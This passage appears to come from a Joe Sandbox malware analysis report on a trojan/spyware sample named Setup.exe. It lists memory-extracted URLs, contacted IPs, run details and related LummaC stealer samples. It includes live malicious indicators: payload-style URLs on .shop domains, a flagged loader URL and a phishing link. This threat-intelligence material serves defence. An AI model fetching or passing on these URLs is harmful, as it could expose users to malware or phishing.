                                                                                                      		high
                                                                                                      http://anglebug.com/5281chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Setup.exe, 00000000.00000002.2769540945.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1830124954.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drfalse
                                                                                                          		high
                                                                                                          https://klipcatepiu0.shop/int_clp_ldr_sha.txtmpSetup.exe, 00000000.00000002.2769540945.0000000000BB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          https://www.google.com/dl/release2/chrome_component/acccxbt6wwsvpxzpob4hojndwkqq_4.10.2830.0/oimompechrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://issuetracker.google.com/255411748chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546747717.0000650800C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.google.com/Char:i3chrome.exe, 00000002.00000002.3544789255.000065080080C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 00000002.00000002.3544674309.00006508007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544572535.0000650800788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546786829.0000650800C58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.google.com/dl/release2/chrome_component/ads7ltfl2gw6hxwgakn3sxrkoijq_9.53.0/gcmjkmgdlgnkkchrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://anglebug.com/7246chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543119025.0000650800474000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://anglebug.com/7369chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enSetup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drfalse
                                                                                                                          		high
                                                                                                                          https://anglebug.com/7489chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://duckduckgo.com/?q=chrome.exe, 00000002.00000002.3544674309.00006508007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546706926.0000650800C34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://chrome.google.com/webstorechrome.exe, 00000002.00000003.1883574094.0000650800CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888667895.0000650800F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1878438319.000065080048C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885769494.0000650800CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882698145.0000650800CF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://polymer.github.io/PATENTS.txtchrome.exe, 00000002.00000002.3542362273.00006508002A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1887219651.0000650800F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888049278.00006508010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1887772313.00006508010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888463880.0000650800F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1889128782.000065080120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1887848412.0000650800F54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1887601115.0000650801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888826743.000065080040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888485035.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888519543.0000650800F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888423202.0000650800CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1889004039.00006508010F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000002.00000002.3546607316.0000650800C0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://issuetracker.google.com/161903006chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546747717.0000650800C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://dl.google.com/release2/chrome_component/cxmnq7ci5es7kes4fruun62via_2024.12.17.1202/ggkkehgbnfchrome.exe, 00000002.00000002.3541370501.0000650800040000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.ecosia.org/newtab/chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://lv.queniujq.cnSetup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.youtube.com/Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://drive-daily-5.corp.google.com/chrome.exe, 00000002.00000002.3542662744.000065080030C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1878438319.000065080048C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engSetup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.fastly.steamstatic.Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000002.00000002.3548674885.0000650800EF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543297672.00006508004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544470238.000065080074C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000002.00000002.3544959461.0000650800878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543332924.00006508004F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_pchrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://anglebug.com/3078chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://anglebug.com/7553chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://anglebug.com/5375chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_pachrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://ogs.googchrome.exe, 00000002.00000002.3549428510.000065080101D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://anglebug.com/5371chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.google.com/dl/release2/chrome_component/fw4ggtylvtq6i65ti33m4vqijm_2024.12.14.1/kiabhabjchrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://anglebug.com/4722chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://m.google.com/devicemanagement/data/apichrome.exe, 00000002.00000003.1877568441.00006508001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000002.00000002.3548674885.0000650800EF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543297672.00006508004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544470238.000065080074C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amSetup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://www.google.com/recaptcha/Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://checkout.steampowered.com/Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://anglebug.com/7556chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://chromewebstore.google.com/chrome.exe, 00000002.00000002.3541299980.000065080000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://drive-preprod.corp.google.com/chrome.exe, 00000002.00000002.3542662744.000065080030C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1878438319.000065080048C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://clients4.google.com/chrome-syncchrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://unisolated.invalid/achrome.exe, 00000002.00000002.3545518029.00006508009D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://www.google.com/tools/feedback/chrome/__submitechrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://anglebug.com/6692chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://issuetracker.google.com/258207403chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546747717.0000650800C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://klippetamea8.shop/NAURGGBG953NT9QEQBG3.binSSetup.exe, 00000000.00000002.2769540945.0000000000B48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://anglebug.com/3502chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://anglebug.com/3623chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546706926.0000650800C34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://anglebug.com/3625chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546706926.0000650800C34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://anglebug.com/3624chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546706926.0000650800C34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high

                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              104.121.10.34
                                                                                                                                                                                                              		steamcommunity.comUnited States
                                                                                                                                                                                                              		16625AKAMAI-ASUSfalse
                                                                                                                                                                                                              239.255.255.250
                                                                                                                                                                                                              		unknownReserved
                                                                                                                                                                                                              		unknownunknownfalse
                                                                                                                                                                                                              104.21.2.114
                                                                                                                                                                                                              		ras2.shopUnited States
                                                                                                                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                              172.217.21.36
                                                                                                                                                                                                              		www.google.comUnited States
                                                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                                                              142.250.181.78
                                                                                                                                                                                                              		plus.l.google.comUnited States
                                                                                                                                                                                                              		15169GOOGLEUSfalse

                                                                                                                                                                                                              Private

                                                                                                                                                                                                              IP
                                                                                                                                                                                                              192.168.2.4
                                                                                                                                                                                                              127.0.0.1

                                                                                                                                                                                                              General Information

                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1581482
                                                                                                                                                                                                              Start date and time:2024-12-27 21:26:30 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 7m 33s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Run name:Run with higher sleep bypass
                                                                                                                                                                                                              Number of analysed new started processes analysed:13
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:Setup.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal92.troj.spyw.evad.winEXE@30/25@8/7
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 98%
                                                                                                                                                                                                              • Number of executed functions: 41
                                                                                                                                                                                                              • Number of non-executed functions: 221
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 172.217.19.227, 64.233.161.84, 172.217.19.238, 142.250.181.142, 142.250.181.99, 142.250.181.74, 172.217.19.202, 172.217.17.42, 142.250.181.138, 142.250.181.106, 216.58.208.234, 172.217.19.234, 172.217.17.74, 142.250.181.42, 20.189.173.22, 20.42.65.92, 172.217.17.35, 172.217.17.46, 52.182.143.212, 172.217.19.206, 52.168.117.173, 172.202.163.200, 20.190.177.146, 2.22.157.166, 13.107.246.63
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): clients1.google.com, onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, update.googleapis.com, umwatson.events.data.microsoft.com, clients.l.google.com, www.gstatic.com, optimizationguide-pa.googleapis.com
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                              • VT rate limit hit for: Setup.exe

                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                              No simulations

                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                              IPs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              239.255.255.250http://proxyium.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                https://cbhc9.anguatiab.ru/RpweC/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  https://greensofttech1-my.sharepoint.com/:f:/g/personal/stella_huang_greensofttech1_onmicrosoft_com/EuOSopXBEUpFhaHAwqFRDM8BeWLY-Gsl0U9Az2fOy4x80A?e=GhPegT&xsdata=MDV8MDJ8TVB1Z2FAaHljaXRlLmNvbXxjMDM5NmJhZjcxOTM0YzBkMTc3ZDA4ZGQxMzcwNWQ3MnxmYzVjNjhmNjk3ZjM0ZWZlYjY4OWViNWMxMjM0ZjgyMXwwfDB8NjM4Njg4MDk1NTQ0NTA0NzA2fFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=SVpsejJNYUlwY213VjNreGxSNU1LaFJXcnpXS3pwWjhYR2k5ZUthLzlsMD0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    http://bitstampweb.0532tg.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=enGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUMFBJSDkxQ0w3VVZMNFJFUlNDRVkyU05CUi4uGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          http://resources.onestart.ai/onestart_installer_130.0.6723.134.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            http://resources.onestart.ai/onestart_installer_130.0.6723.134.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              https://chamberoflearning.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU1uZ3phbkk9JnVpZD1VU0VSMTcxMjIwMjRVNTkxMjE3Mjk=N0123NCA_A8_CHF@emfa.ptGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                104.121.10.34Vq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                                      fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                                        hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse

                                                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    steamcommunity.comVq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                    GxX48twWHA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.102.49.254
